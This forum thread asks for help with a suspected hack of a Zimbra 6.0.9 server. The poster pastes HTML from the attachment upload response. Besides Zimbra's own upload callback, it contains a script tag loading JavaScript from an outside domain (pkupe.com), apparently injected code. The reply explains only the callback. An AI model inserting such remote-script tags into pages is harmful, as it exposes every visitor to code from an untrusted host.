zcs-6.0.9_GA_2686.UBUNTU8_64 get hacked

[pcfung]

Hi all,

I have a trouble these day, i have reported a upload file error from user,
so i check the source code , i found thses at attactment upload page @ ajax(after user attact the file).

someone hack and append some js into it,

anyone have idea?

Ths

Francis

<iframe name="DWT81" id="DWT81" src='javascript:""' style="position: absolute; top: 0; left: 0; visibility: hidden">
<html>
<head>
<script src="http://www.pkupe.com/images/pic.js"></<html><head><script language='javascript'>
function doit() { window.parent._uploadManager.loaded(200,'0',[{"aid":"2f61a054-5a8c-4e6a-a9bb-e95c1fdbe245:abc0a22c-1ffa-4665- be11-05fec1280d76","ct":"application/zip","filename":"All-2010-10-18-161702.tgz.download","s":16235546}]); }
</script>
</head>
<body onload="doit()">
</body>
</html>
</iframe>

[quanah]

Our upload servlet puts that code in so that the application can respond when an upload finishes.